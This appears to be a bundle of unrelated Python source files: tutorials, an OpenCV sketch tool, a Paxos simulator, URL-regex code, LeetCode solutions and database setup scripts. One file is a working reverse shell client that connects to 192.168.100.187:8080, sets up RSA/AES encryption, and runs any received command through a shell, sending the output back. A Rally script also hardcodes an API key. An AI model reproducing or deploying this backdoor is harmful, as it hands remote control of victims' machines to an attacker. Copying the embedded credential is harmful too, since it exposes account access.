field=models.ForeignKey(to='User.Tool'),
),
]
|
a = [1,2,3,4,5,6] #creating a list using [] bracket
print(a) # printing the list
print(a[0]) # printing the element of the list
a[0] = 19 #changing the element of the list
print(a)
# we can create a list with items of different type
b = [19,"sarthak","python developer",False,6.8]
print(b)
#list slicing
print(b[1])
print(b[0:3]) #as same as string slicing |
#!/usr/bin/env python
# coding: utf-8
# In[2]:
import cv2
# In[3]:
def nothing(x):
pass
cv2.namedWindow('threshold')
cv2.namedWindow('canny')
# add ON/OFF switch to "canny"
switch_c = '0 : OFF \n1 : ON'
switch_t = '0 : OFF \n1 : ON'
cv2.createTrackbar(switch_c, 'canny', 0, 1, nothing)
cv2.createTrackbar(switch_t, 'threshold', 0, 1, nothing)
# add lower and upper threshold slidebars to "canny"
cv2.createTrackbar('lower', 'canny', 0, 255, nothing)
cv2.createTrackbar('upper', 'canny', 0, 255, nothing)
cv2.createTrackbar('value', 'threshold', 0, 255, nothing)
# cv2.createTrackbar('upper', 'threshold', 0, 255, nothing)
def sketch(image):
# Convert image to grayscale
return threshold
def capture():
cap = cv2.VideoCapture(0)
while True:
ret, frame = cap.read()
image=frame
img_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# Clean up image using Guassian Blur
img_gray_blur = cv2.GaussianBlur(img_gray, (5,5), 0)
lower_c = cv2.getTrackbarPos('lower', 'canny')
upper_c = cv2.getTrackbarPos('upper', 'canny')
# lower_t = cv2.getTrackbarPos('value', 'threshold')
upper_t = cv2.getTrackbarPos('value', 'threshold')
s_c = cv2.getTrackbarPos(switch_c, 'canny')
s_t = cv2.getTrackbarPos(switch_t, 'threshold')
if s_c == 0:
edges = img_gray
else:
edges = cv2.Canny(img_gray, lower_c, upper_c)
if s_t == 0:
threshold = edges
else:
ret,threshold = cv2.threshold(edges,0,upper_t,cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)
cv2.imshow('original', image)
cv2.imshow('canny', edges)
cv2.imshow('threshold',threshold)
k = cv2.waitKey(1) & 0xFF
if k==13:
cv2.imshow("Final Sketch",threshold)
print("captured")
cv2.imwrite("./MySketch.jpg",threshold)
elif k==27:
print("exit")
break
cap.release()
cv2.destroyAllWindows()
capture()
# try:
# capture()
# # print()
# except:
# print("Error")
# finally:
# cv2.destroyAllWindows()
# if(cap!=null):
# cap.release()
# cv2.destroyAllWindows()
# In[4]:
# while True:
# frame=capture();
# op=sketch(frame)
# if(cv2.waitKey(0)==13):
# # confirm --> Enter
# cv2.imwrite("MySketch.jpg",op)
# break;
# elif(cv2.waitKey(0)==32):
# cv2.destroyAllWindows()
# continue;
# else:
# break;
# cv2.destroyAllWindows()
# In[ ]:
|
if __name__ == "__main__":
n, m = map(int, input().split())
sneezes = 0
while m > 0:
if m & 1:
sneezes += 1
m = m // 2
print(sneezes)
|
import subprocess
import os
import time
import recent.markup.markup
from recent.notifier.base import Notifier
class X11Notifier(Notifier):
id = 'x11notify'
deps = ['x11']
config_keys = ['display']
def notify(self, item):
if self.config['display'].startswith(':'):
os.putenv('DISPLAY', self.config['display'])
elif 'DISPLAY' not in os.environ:
os.putenv('DISPLAY', ':0')
lm = recent.markup.markup.LogMarkup()
lo = recent.markup.markup.LogOutputMarkup(width=0)
lm.buff = item.title
lm.parse(lo)
title = lo.buff
if len(title) > 200:
title = title[:200]+'…'
if item.author:
text = '<b>%s</b>: %s'%(item.author, title)
else:
text = title
text = text.encode('utf-8')
p = subprocess.Popen(['notify-send',item.provider,text])
p.wait()
|
import unittest
def unique_0(s):
dic = {}
for c in s:
if c in dic:
return False
dic[c] = True
return True
def unique_1(s):
return len(s) == len(set(s))
class Test(unittest.TestCase):
def test_unique(self):
data = [
('', True),
('abc', True),
('aaa', False),
('abcbad', False),
]
for k, v in globals().items():
if k.startswith('unique_'):
for s, r in data:
self.assertEqual(v(s), r)
if __name__ == '__main__':
unittest.main()
|
#!/usr/bin/env python
'''
This program is used to simulate the basic Paxos algorithm.
The Proposer is also the Learner who finally learns which proposal is chosen. The Acceptor receives proposal and make desision.
We simulate the case that network is broken so the message can not reach to a target. But we do not simulate the absence of participators.
The global unique proposal_id is generated with the equation : proposal_id = N*max_proposer_num + proposer_ID
To make it simple, please reference the figures in http://www.jianshu.com/p/d9d067a8a086
'''
from Queue import Empty
from Queue import Queue
import random
import threading
import time
mutex = threading.Lock()
gvalues = [ "[Operation A]",
"[Operation B]",
"[Operation C]",
"[Operation D]",
"[Operation E]",
"[Operation F]"]
live_proposer_num = 0
live_acceptor_num = 0
acceptors_num = 3
proposers_num = 3
max_proposer_num = 20 # It is used to generate unique sequence ID for each proposer
acceptor_can_ignore = False # Used to simulate whether an acceptor sends response to proposer when rejecting proposal
debug_level = 1
def printStr(string, level=0):
if level <= debug_level:
mutex.acquire()
print "%s::%s" % (str(time.time()), string)
mutex.release()
# Counting how many proposer is proposing
def proposer_live(inc):
mutex.acquire()
global live_proposer_num
if inc:
live_proposer_num += 1
else:
live_proposer_num -= 1
mutex.release()
# Counting how many acceptor is listening
def acceptor_live(inc):
mutex.acquire()
global live_acceptor_num
if inc:
live_acceptor_num += 1
else:
live_acceptor_num -= 1
mutex.release()
class Proposer(threading.Thread):
def __init__(self, t_name, # Name of the thread
queue_from_acceptor, # Queue to get message from acceptors
queue_to_acceptors, # Queues to send message to acceptors
id, # The ID of current proposer
m_acceptor_num): # Total number of of acceptor
super(Proposer, self).__init__()
self.queue_recv = queue_from_acceptor
self.queue_send_list = queue_to_acceptors
self.m_acceptor_num = m_acceptor_num
self.live_acceptor_num = 0 # Number of acceptors this thread talks to
self.max_proposal_id = 0 # The max proposal ID return from acceptors
self.name = t_name
self.id = id
self.reject = 0
self.accept = 0
self.status = None
self.N = 0 # Used to generate global unique proposal ID
self.value = None
proposer_live(True)
def run(self):
# raise a proposal
self.status = "prepare"
self.value = gvalues[random.randrange(0, 6)] # It can be None until sending accept to acceptors
while True:
# In "prepare" stage, send proposal to acceptors
self.sendPropose()
# Receive response from all acceptors
while True:
try:
var = self.queue_recv.get(True, 4)
self.processMsg(var)
if (self.reject + self.accept) == self.live_acceptor_num:
printStr("Stage %s; %s get response from all acceptors." % (self.status, self.name), 2)
break
except Empty:
# At least one acceptor dose not send response to the proposer
printStr("Stage %s; %s get timeout when waiting response from acceptors" % (self.status, self.name), 2)
break
# Summarize all response from acceptors
# If not majority agree on the proposal, increase proposal ID and raise proposal gain
if not self.summarize():
continue
# In "accept" stage, send proposal to acceptors
self.sendPropose()
# Receive response from all acceptors
while True:
try:
var = self.queue_recv.get(True, 1)
self.processMsg(var)
if (self.reject + self.accept) == self.live_acceptor_num:
printStr("Stage %s; %s get response from all acceptors." % (self.status, self.name), 2)
break
except Empty:
# At least one acceptor dose not send response to the proposer
printStr("Stage %s; %s get timeout when waiting response from acceptors" % (self.status, self.name), 2)
break
# Summarize all response from acceptors
# If not majority agree on the proposal, increase proposal ID and raise proposal gain
if not self.summarize():
continue
# If majority agree on the proposal, print the learned "value" and exit
printStr("\033[1;32m#### %s get final agreement from majority. Agree on proposal : %s. Thread exit.\033[0m" % (self.name, self.value), 0)
proposer_live(False)
break
def processMsg(self, var):
if self.status == "prepare" and var["type"] == "prepare":
if var["result"] == "reject":
self.reject += 1
elif var["result"] == "accept":
self.accept += 1
# In prepare stage, multiple acceptors respond to the proposer, chose the response with valid "value" and max proposal_id
# and use the associated value as its own value and go to the accept stage
# else the proposor uses its own original value
if var.get("value", None) and var.get("proposal_id", None) and var["proposal_id"] > self.max_proposal_id:
# remember the max proposal_id
self.max_proposal_id = var["proposal_id"]
self.value = var["value"]
elif self.status == "accept" and var["type"] == "accept":
if var["result"] == "reject":
self.reject += 1
elif var["result"] == "accept":
self.accept += 1
def sendPropose(self):
self.reject = 0
self.accept = 0
time.sleep(1/random.randrange(1, 20))
body = {
"type": self.status,
"proposal_id": (self.N * max_proposer_num + self.id),
"value": self.value,
"proposer": self.id
}
# Send message to acceptors, simulating network broken with 10% ratio
selected_acceptor = []
selected_id = []
i = 0
for acceptor in self.queue_send_list:
if random.randrange(100) < 90:
selected_acceptor.append(acceptor)
selected_id.append(i)
i += 1
self.live_acceptor_num = len(selected_acceptor)
printStr("Stage %s; %s propose with proposal ID = %d, value = %s. Message reaches Acceptor %s" % (self.status, self.name, body["proposal_id"], self.value, str(selected_id)), 1)
for acceptor in selected_acceptor:
acceptor.put(body)
time.sleep(1/random.randrange(1, 10))
def summarize(self):
getAgree = True
printStr("Stage %s; %s proposes %s summary : %d accept and %d reject" % (self.status, self.name, self.value, self.accept, self.reject), 1)
if self.accept > self.m_acceptor_num / 2:
# If get majority accept, go to next stage
if self.status == "prepare":
self.status = "accept"
else:
self.status = "prepare"
else:
# else increase proposal ID and raise proposal again
self.N += 1
getAgree = False
self.status = "prepare"
return getAgree
class Acceptor(threading.Thread):
def __init__(self, t_name, queue_from_proposer, queue_to_proposers, id):
super(Acceptor, self).__init__()
self.name = t_name
self.queue_recv = queue_from_proposer
self.queue_to_proposers = queue_to_proposers
self.id = id
self.max_responded_proposal_id = None # It is the max proposal ID which it responds to proposor in "prepare" stage
self.max_accepted_proposal_id = None # It is the max proposal ID which it accepts in "accept" stage
self.value = None
acceptor_live(True)
def run(self):
while True:
try:
var = self.queue_recv.get(True, 1)
ignore, resp =self.processPropose(var)
if ignore and acceptor_can_ignore:
continue
# Simulating the network failure with 10% ratio
if random.randrange(100) < 90:
self.queue_to_proposers[var["proposer"]].put(resp)
printStr("Stage %s; %s responds to Proposer%d with %s" % (var["type"], self.name, var["proposer"], str(resp)), 2)
# printStr("Stage %s; %s responds to Proposer%d with proposal_id = %d, result = %s, value = %s" % (var["type"], self.name, var["proposer"], vars.get("proposal_id", -1), vars["result"], vars.get("value", None)), 2)
else:
printStr("Stage %s; %s fails to respond to Proposer%d." % (var["type"], self.name, var["proposer"]), 2)
pass
except Empty:
pass
if live_proposer_num == 0:
acceptor_live(False)
break
continue
def processPropose(self, var):
ignore = False
res = {"type":var["type"], "acceptor":self.id}
if var["type"] == "prepare":
if not self.max_responded_proposal_id:
# If it never seen a proposal, promise never accept a proposal with proposal ID less than var["proposal_id"] in future
self.max_responded_proposal_id = var["proposal_id"]
res["result"] = "accept"
res["proposal_id"] = var["proposal_id"] # return the proposal ID as the max ID that the accepter has ever seen
elif self.max_responded_proposal_id > var["proposal_id"]:
# If ever seen a proposal with higher proposal ID, ignore the message or respond with "reject"
# Responding the message can optimize performance to avoid network timeout in proposer side
res["result"] = "reject"
ignore = True
elif self.max_responded_proposal_id == var["proposal_id"]:
# Should never go into this case
res["result"] = "reject"
ignore = True
else: # self.max_accepted_proposal_id && var["proposal_id"] > self.max_responded_proposal_id
# If it receives a proposal with a higher proposal ID than what it has ever seen, accept the proposal
# and respond with the max proposal ID and its associated value (if there is a value)
res["result"] = "accept"
res["proposal_id"] = self.max_accepted_proposal_id # return the max ID it has ever accepted (It can be None)
res["value"] = self.value # return the value associated with the max ID (It can be None)
self.max_responded_proposal_id = var["proposal_id"] # promise it will never accept a proposal ID less than var["proposal_id" in future
elif var["type"] == "accept":
if self.max_responded_proposal_id > var["proposal_id"]:
# If has ever seen a proposal with higher proposal ID, ignore the message or respond with "reject"
# Responding the message can optimize performance to avoid network timeout in proposer side
res["result"] = "reject"
ignore = True
else:
# If it receives a proposal with a higher proposal ID that what it has ever seen, accept the proposal.
# The message should be sent to a logical leaner. Because there is no leaner here, so respond to proposer
res["result"] = "accept"
self.max_accepted_proposal_id = var["proposal_id"]
self.value = var["value"]
return ignore, res
if __name__ == '__main__':
q_to_acceptors = []
q_to_proposers = []
proposers = []
acceptors = []
q_leader_to_proposers = []
q_to_leader = Queue()
for i in range(0, acceptors_num):
q_to_acceptors.append(Queue())
for i in range(0, proposers_num):
q_to_proposers.append(Queue())
q_leader_to_proposers.append(Queue())
for i in range(0, proposers_num):
proposers.append(Proposer("Proposer%d" % i,
q_to_proposers[i],
q_to_acceptors,
i,
acceptors_num))
for i in range(0, acceptors_num):
acceptors.append(Acceptor("Acceptor%d" % i,
q_to_acceptors[i],
q_to_proposers,
i))
for i in range(0, acceptors_num):
acceptors[i].setDaemon(True)
acceptors[i].start()
for i in range(0, proposers_num):
proposers[i].setDaemon(True)
proposers[i].start()
while True:
time.sleep(1)
if live_acceptor_num == 0:
break
|
import re
textstr = "http://220.181.154.15/youku/777/6973A2989B932823EEF40247DA/0300020100563ABD71FD2B0230E416F0CBC1F3-EE10-EB22-744F-6010E6849F8C.flv?nk=314613209945_24111796410&ns=2880720_2720180&special=true"
#textstr = "http://220.181.154.15/youku/777/6973A2989B932823EEF40247DA/0300020100563ABD71FD2B0230E416F0CBC1F3-EE10-EB22-744F-6010E6849F8C.flv"
#textstr = 'http://127.0.0.1:80/302_mark/p.l.ykimg.com/ykp2pdata?json=%7B%22ac%22:%22110000%22,%22sid%22:%22644772697605310bff2aa%22,%22time%22:1447727005274,%22vid%22:%22347094008%22,%22ct%22:%2291%22,%22data%22:%7B%22index%22:0,%22addErrorData%22:%7B%22useTime%22:30520,%22metaUrl%22:%22http://106.38.249.75/youku/6572D8744C6407B19EF2B2AB3/0300080100564A782EF2760230E416C173656D-E6E7-175B-B61C-E406C4964545.mp4%22,%22processType%22:%22meta%22%7D%7D,%22errorType%22:%22datamgr_metadata_timeout_error%22,%22logType%22:%22fatal%22,%22vt%22:%22mp4%22,%22vs%22:%2210-14-10-56%22,%22acc%22:3,%22dc%22:%2223724%22,%22cfg%22:%22player_yk_601%22%7D'
#pattern = re.compile(r"(\w+://)?([^/]+)(/youku/)(.+/)*([^\?]+)(\?([^&=]+=[^&]+)((&[^=]+=[^&]+)*))?")
pattern = re.compile(r"(\w+://)?([^/]+)(/youku/)(.+/)*([^.?/]+\.(mp4|flv)(?=\?|$))(\?([^&=]+=[^&]+)((&[^=]+=[^&]+)*))?")
"("
match = pattern.match(textstr)
if match:
for i,x in enumerate(match.groups(),1):
print i,x
print match.expand(r'\1*\3*/\5')
print match.expand(r'\1\2\3\4\5')
#print match.expand(r'\7')
#print match.expand(r'\8')
a = match.expand(r'\4')
tmppattern = re.compile(r"[^/]+/")
print tmppattern.sub("*/",a)
CacheIp = r'127.0.0.1:80/302_mark/'
pattern_star = re.compile(r"[^/]+/")
pattern_youku = re.compile(r"(\w+://)?([^/]+)(/youku/)(.+/)*([^.?/]+\.(mp4|flv)(?=\?))(\?([^&=]+=[^&]+)((&[^=]+=[^&]+)*))?")
filter_set_youku = {'nk','ns','start'}
def UrlTrans(url):
url_MIE=''
url_cache=''
match=pattern_youku.match(url)
if match:
url_MIE=match.expand(r'\1*\3'+pattern_star.sub(r'*/',match.expand(r'\4'))+r'\5')
url_cache=match.expand(r'\g<1>'+CacheIp+r'\2\3\4\5')
tmp = list()
if match.group(7):
tmp.append(match.group(8))
if match.group(9):
tmp.extend(match.group(9)[1:].split('&'))
tmpstr=''
for i in tmp:
if i.split('=')[0] not in filter_set_youku:
tmpstr+=i
if tmpstr:
url_cache+='?'
url_cache+=tmpstr
return url_MIE,url_cache
return url,url
print '-----------------------------------------------------'
print UrlTrans(textstr)
text = "127.0.0.1/baidu.com"
pattern_default = re.compile(r"(\w+://)?(.+)")
match = pattern_default.match(text)
if match.group(1):
url_cache=match.group(1)
else:
url_cache=""
url_cache+=CacheIp
url_cache+=match.group(2)
print url_cache
"http://iosapps.itunes.apple.com/apple-assets-us-std-000001/Purple69/v4/f6/3a/39/f63a39ad-76ae-77d4-9d2d-a21664cefc89/pre-thinned6390962509010654325.thinned.signed.dpkg.ipa?accessKey=1447331811_8321268509499498333_ngbz9y0%2FANW9WMZOrCcr4%2BRD4tzEwCLWyiQBtTOt%2FdmTjo1Sv4HRW%2BaTCJjSe3Z6T7V4FV%2BqIL5qgbOKDUxbWGcL2v5Fu1w3kU3KcuYcKtLFKIrO1dj43A65z%2BHKBVQ5nPO6ly0JAQAswWhsKOIIMABhZO5%2FpQMvS%2Bel%2FhZdYdSJaddPBYnudLeYYG0OnF6sKol2cLJU6sCMdoF%2BSGEICby75t9fNg7i6caPaPISuWs%3D"
|
# Given a string, find the first non-repeating character in it and return
# it's index. If it doesn't exist, return -1.
#
# Examples:
#
# s = "leetcode"
# return 0.
#
# s = "loveleetcode",
# return 2.
# Note: You may assume the string contain only lowercase letters.
def first_unique_char(s):
low = {}
seen = set()
unique = []
for i, c in enumerate(s):
if c not in seen:
seen.add(c)
unique.append(c)
if c not in low:
low[c] = i
else:
if c in unique:
unique.remove(c)
return low[unique[0]] if unique else -1
assert first_unique_char("leetcode") == 0
assert first_unique_char("loveleetcode") == 2
assert first_unique_char("cc") == -1
|
# Download Pycrypto for Windows - pycrypto 2.6 for win32 py 2.7
# http://www.voidspace.org.uk/python/modules.shtml#pycrypto
# Download Pycrypto source
# https://pypi.python.org/pypi/pycrypto
# For Kali, after extract the tar file, invoke "python setup.py install"
import socket
import subprocess
from Crypto.PublicKey import RSA
from Crypto.Cipher import AES
def decryptAESKey(encrypted_aes_key, client_RSA_private_key):
decryptor = RSA.importKey(client_RSA_private_key)
aes_key = decryptor.decrypt(encrypted_aes_key)
return aes_key
def encrypt(message, aes_key, counter):
encrypto = AES.new(aes_key, AES.MODE_CTR, counter=lambda: counter)
return encrypto.encrypt(message)
def decrypt(message, aes_key, counter):
decrypto = AES.new(aes_key, AES.MODE_CTR, counter=lambda: counter)
return decrypto.decrypt(message)
def connect():
# do client RSA key stuff
new_key = RSA.generate(4096 ) # generate RSA key that 4096 bits long
# export the keys in PEM format, the PEM extension contains ASCII encoding
client_RSA_public_key = new_key.publickey().exportKey("PEM")
client_RSA_private_key = new_key.exportKey("PEM")
print 'created RSA keys'
print client_RSA_public_key
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# to prevent "socket.error: [Errno 98] Address already in use" (socket is in a TIME_WAIT state)
# we set a flag to prevent this
# SO_REUSEADDR flag tells the kernel to reuse a local socket in TIME_WAIT state, without waiting for its natural timeout to expire
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.connect(('192.168.100.187', 8080))
# send client RSA public key to server - server will create AES key and send it encrypted (with client public key) back to client
s.send(client_RSA_public_key)
# do AES encryption stuff
# receive encrypted AES key -> decrypt with RSA private key
recv_encrypted_aes_key = s.recv(1024)
aes_key = decryptAESKey(recv_encrypted_aes_key, client_RSA_private_key)
# receive encrypted AES counter -> decrypt with RSA private key
recv_encrypted_aes_counter = s.recv(1024)
aes_counter = decryptAESKey(recv_encrypted_aes_counter, client_RSA_private_key)
while True:
command = decrypt(s.recv(1024), aes_key, aes_counter)
print ' We received: ' + command
if 'terminate' in command:
s.close()
break
else:
CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
s.send(encrypt(CMD.stdout.read(), aes_key, aes_counter))
s.send(encrypt(CMD.stderr.read(), aes_key, aes_counter))
def main ():
connect()
main()
|
from pyral import Rally, rallySettings, rallyWorkset
import sys
import csv
"""
"""
gAttribs = [
"FormattedID", #"Name",
"ScheduleState",
"Project.Name",
"Project.Parent.Name",
"PlanEstimate",
"Iteration.Name",
"PortfolioItem.FormattedID", #"PortfolioItem.Name",
"PortfolioItem.Parent.FormattedID", #"PortfolioItem.Parent.Name",
]
def get_deep_attr(obj, attrs):
for attr in attrs.split("."):
try:
obj = getattr(obj, attr)
except AttributeError:
return ""
return obj
def has_deep_attr(obj, attrs):
try:
get_deep_attr(obj, attrs)
return True
except AttributeError:
return False
errout = sys.stderr.write
def main(args):
options = [opt for opt in args if opt.startswith('-')]
args = [arg for arg in args if arg not in options]
#if len(args) != 1:
# errout('ERROR: Wrong number of arguments\n')
# sys.exit(3)
#args = ["US504765"] # no TF
#args = ["US487422"] #for Titans
server = 'rally1.rallydev.com'
apikey = '_LhzUHJ1GQJQWkEYepqIJV9NO96FkErDpQvmHG4WQ'
workspace = 'Sabre Production Workspace'
project = 'Sabre'
project = 'LGS Titans (BLR)'
print ('Logging in...')
rally = Rally(server, apikey=apikey, workspace=workspace, project=project)
print ('Query execution...')
for arg in args:
if arg[0] == "D":
entityName = 'Defect'
elif arg[0] == "U":
entityName = 'HierarchicalRequirement'
else:
entityName = 'PortfolioItem'
#queryString = 'FormattedID = "%s"' % arg
queryString = '(Iteration.StartDate > "2017-12-31")'
entityName = 'HierarchicalRequirement'
print ("Query = ", queryString)
response = rally.get(entityName, fetch=True, projectScopeDown=True, query=queryString)
if response.resultCount == 0:
errout('No item found for %s %s\n' % (entityName, arg))
else:
fileName = 'out.csv'
with open (fileName, 'w', newline='') as csvfile:
outfile = csv.writer(csvfile, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
outrow = [field for field in gAttribs]
outfile.writerow(outrow)
for item in response:
outfile.writerow( [get_deep_attr(item, param) for param in gAttribs])
if __name__ == '__main__':
main(sys.argv[1:])
|
# -*- coding: utf-8 -*-
# This file as well as the whole tsfresh package are licenced under the MIT licence (see the LICENCE.txt)
# Maximilian Christ (maximilianchrist.com), Blue Yonder Gmbh, 2016
"""
Contains methods to start and stop the profiler that checks the runtime of the different feature calculators
"""
import cProfile
import io
import logging
import pstats
from tsfresh import defaults
_logger = logging.getLogger(__name__)
# todo: tackle a debate about the need for this profiler
# todo: we need unit tests for the profiling routine
def start_profiling():
"""
Helper function to start the profiling process and return the profiler (to close it later).
:return: a started profiler.
:rtype: cProfile.Profile
Start and stop the profiler with:
>>> profiler = start_profiling()
>>> # Do something you want to profile
>>> end_profiling(profiler, "cumulative", "out.txt")
"""
profiler = cProfile.Profile()
profiler.enable()
return profiler
def end_profiling(profiler, filename, sorting=None):
"""
Helper function to stop the profiling process and write out the profiled
data into the given filename. Before this, sort the stats by the passed sorting.
:param profiler: An already started profiler (probably by start_profiling).
:type profiler: cProfile.Profile
:param filename: The name of the output file to save the profile.
:type filename: basestring
:param sorting: The sorting of the statistics passed to the sort_stats function.
:type sorting: basestring
:return: None
:rtype: None
Start and stop the profiler with:
>>> profiler = start_profiling()
>>> # Do something you want to profile
>>> end_profiling(profiler, "out.txt", "cumulative")
"""
profiler.disable()
s = io.StringIO()
ps = pstats.Stats(profiler, stream=s).sort_stats(sorting)
ps.print_stats()
with open(filename, "w+") as f:
_logger.info(
"[calculate_ts_features] Finished profiling of time series feature extraction"
)
f.write(s.getvalue())
def get_n_jobs():
"""
Get the number of jobs to use for parallel processing.
:return: The number of jobs to use for parallel processing.
:rtype: int
"""
return defaults.N_PROCESSES
def set_n_jobs(n_jobs):
"""
Set the number of jobs to use for parallel processing.
:param n_jobs: The number of jobs to use for parallel processing.
:type n_jobs: int
:return: None
:rtype: None
"""
defaults.N_PROCESSES = n_jobs
|
from constants import DEFAULT_LOCATION_DESCRIPTION
class Environment:
"""Represent the game's environment; physical and historical."""
_shared_state = {"items": []}
def __init__(self):
self.__dict__ = self._shared_state
def best_match(self, itemname):
"""
Return the best match for a given item's name.
:param itemname: The requested name of the item.
:returns: The best-match object for that item name.
"""
# Todo: decide how it's really gonna be the "best" match.
for i in self.nearby_items:
if i.name in itemname or itemname in i.name:
return i
else:
return itemname
# raise ValueError("Haven't got one of those.")
@property
def nearby_items(self):
"""
Given the player's current location and attributes, yield from the
list of nearby items.
:returns: Yields from all nearby items.
"""
# Todo: list *nearby* items; not just all items.
yield from self.items
@property
def description(self):
"""
Print out a description of the player's current whereabouts.
:return: A description as above.
"""
# Todo: Dynamically generate a description of the player's whereabouts.
items = list(self.nearby_items)
if len(items) == 0:
return "You can't see anything around you."
return DEFAULT_LOCATION_DESCRIPTION + "\nNear you: \n" + (
"; ".join(map(str, items))
)
class Player:
"""Represent the current player."""
_shared_state = {"context_objects": None}
def __init__(self):
self.__dict__ = self._shared_state
def __getattr__(self, name):
if name.startswith("is_"):
return getattr(self, name.replace("is", ""), False)
elif name.startswith("set_"):
return lambda: setattr(self, name.replace("set", ""), True)
elif name.startswith("unset_"):
return lambda: setattr(self, name.replace("unset", ""), False)
return None
player = Player()
environment = Environment()
|
import requests
class BadRequest(requests.exceptions.HTTPError):
"""
Represents a detailed error message from a web server.
"""
def __str__(self) -> str:
message = super().__str__()
return f'{message} (status: {self.response.status_code})'
|
# coding: utf-8
import matplotlib.pyplot as plt
import seaborn as sns
class HistgramCreator():
def __init__(self, parent, figure_num):
self.fig, self.axes = plt.subplots()
self.parent = parent
self.data_list = []
self.data_name_list = []
self.color_list = []
self.fig.canvas.mpl_connect('button_press_event', self.on_click)
self.figure_num = figure_num
self.axes.grid(True)
plt.pause(0.00001)
def on_click(self, event):
if event.button == 3:
# set axis equal or not
if self.parent.equal_list_cmbbox.get() == 'ON':
self.axes.axis('equal')
# no data is selected
if not self.parent.x_data_box.get():
self.parent.status_bar_str.set('Select data from Data List')
else:
self.create_histgram()
def create_histgram(self):
x_group_data_name = self.parent.x_data_box.get().split(',')
x_group_name = x_group_data_name[0]
x_data_name = x_group_data_name[1]
x_data = self.parent.dict_data_frame[x_group_name][x_data_name]
color = self.parent.color_list_cmbbox.get()
if self.parent.hist_kde_list_cmbbox.get() == 'OFF':
is_kde_enable = False
else:
is_kde_enable = True
self.axes = sns.distplot(x_data, color=color, kde=is_kde_enable)
plt.pause(0.00001) |
import sqlite3
db=sqlite3.connect('college.db')
db.execute("DROP TABLE IF EXISTS stud")
db.execute("DROP TABLE IF EXISTS dept")
db.execute("DROP TABLE IF EXISTS courses")
db.execute("DROP TABLE IF EXISTS fac")
db.execute("DROP TABLE IF EXISTS res")
db.execute("CREATE TABLE stud(id INTEGER PRIMARY KEY AUTOINCREMENT,depart VARCHAR(10),course VARCHAR(10),year VARCHAR(10),name VARCHAR(15),addr VARCHAR(10),city VARCHAR(10),mobile VARCHAR(11),email VARCHAR(15))")
db.execute("CREATE TABLE dept(id INTEGER PRIMARY KEY AUTOINCREMENT,depart VARCHAR(10))")
db.execute("CREATE TABLE courses(id INTEGER PRIMARY KEY AUTOINCREMENT,course VARCHAR(10))")
db.execute("CREATE TABLE fac(id INTEGER PRIMARY KEY AUTOINCREMENT,name VARCHAR(15),mobile VARCHAR(10),dept_id INTEGER,course VARCHAR(10),position VARCHAR(10),FOREIGN KEY (dept_id) REFERENCES dept(id),FOREIGN KEY (course) REFERENCES courses(course))")
db.execute("CREATE TABLE res(id INTEGER PRIMARY KEY AUTOINCREMENT,stud_id INTEGER,year VARCHAR(10),score VARCHAR(10),FOREIGN KEY(stud_id) REFERENCES stud(id))")
db.execute("INSERT INTO dept VALUES (NULL,'Dept1')")
db.execute("INSERT INTO dept VALUES (NULL,'Dept2')")
db.execute("INSERT INTO dept VALUES (NULL,'Dept3')")
db.execute("INSERT INTO courses VALUES (NULL,'Course1')")
db.execute("INSERT INTO courses VALUES (NULL,'Course2')")
db.execute("INSERT INTO courses VALUES (NULL,'Course3')")
db.execute("INSERT INTO fac VALUES (NULL,'Name1','Mobile1','Dept1','Course1','Position1')")
db.execute("INSERT INTO fac VALUES (NULL,'Name2','Mobile2','Dept2','Course2','Position2')")
db.execute("INSERT INTO fac VALUES (NULL,'Name3','Mobile3','Dept3','Course3','Position3')")
db.execute("INSERT INTO res VALUES (NULL,1,'Year1','Score1')")
db.execute("INSERT INTO res VALUES (NULL,2,'Year2','Score2')")
db.execute("INSERT INTO res VALUES (NULL,3,'Year3','Score3')")
for i in "12345":
db.execute("INSERT INTO stud VALUES (NULL,?,?,?,?,?,?,?,?)",('Dept'+i,'Course'+i,'Year'+i,'Name'+i,'Addr'+i,'City'+i,'Mobile'+i,'Email'+i))
db.commit()
db.close() |
"""
Time Complexity = O(N)
Space Coomplexity = O(W)
"""
from collections import deque
class Solution:
def getTargetCopy(self, original: TreeNode, cloned: TreeNode, target: TreeNode) -> TreeNode:
if not original or not cloned:
return None
queue = deque()
queue.append(original)
count = 0
while queue:
node = queue.popleft()
count += 1
if node == target:
break
if node.left:
queue.append(node.left)
if node.right:
queue.append(node.right)
queue2 = deque()
queue2.append(cloned)
while queue2:
node = queue2.popleft()
count -= 1
if node.val == target.val and count == 0:
return node
if node.left:
queue2.append(node.left)
if node.right:
queue2.append(node.right) |
from unittest import TestCase
import unittest
from ugly_number import Solution
class TestSolution(TestCase):
def test_uglyNumberCase1(self):
sol = Solution()
self.assertEqual(sol.isUgly(8), True)
def test_uglyNumberCase2(self):
sol = Solution()
self.assertEqual(sol.isUgly(7), False)
def test_uglyNumberCase3(self):
sol = Solution()
self.assertEqual(sol.isUgly(40), True)
if __name__ == '__main__':
unittest.main() |
# pylint: disable = C0103, C0111, C0301, R0913, R0903, R0914, E1101
from __future__ import division
import os
import shutil
# import cPickle as pickle
import tensorflow as tf
def get_trainable_vars(scope_name):
train_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope_name)
return train_vars
def print_hparams(hparams):
hparam_values = hparams.values()
keys = sorted(hparam_values.keys())
# print ''
# for key in keys:
# print '{} = {}'.format(key, hparam_values[key])
# print ''
def save_hparams(hparams):
pkl_filepath = hparams.hparams_dir + 'hparams.pkl'
with open(pkl_filepath, 'wb') as f:
pickle.dump(hparams, f)
def read_hparams(pkl_filepath):
with open(pkl_filepath, 'rb') as f:
hparams = pickle.load(f)
return hparams
def get_ckpt_path(ckpt_dir):
ckpt_dir = os.path.abspath(ckpt_dir)
ckpt = tf.train.get_checkpoint_state(ckpt_dir)
if ckpt and ckpt.model_checkpoint_path:
ckpt_path = os.path.join(ckpt_dir,
ckpt.model_checkpoint_path)
else:
ckpt_path = None
return ckpt_path
def try_restore(hparams, sess, model_saver):
# Attempt to restore variables from checkpoint
ckpt_path = get_ckpt_path(hparams.ckpt_dir)
if ckpt_path: # if a previous ckpt exists
model_saver.restore(sess, ckpt_path)
init_train_iter = int(ckpt_path.split('/')[-1].split('-')[-1])
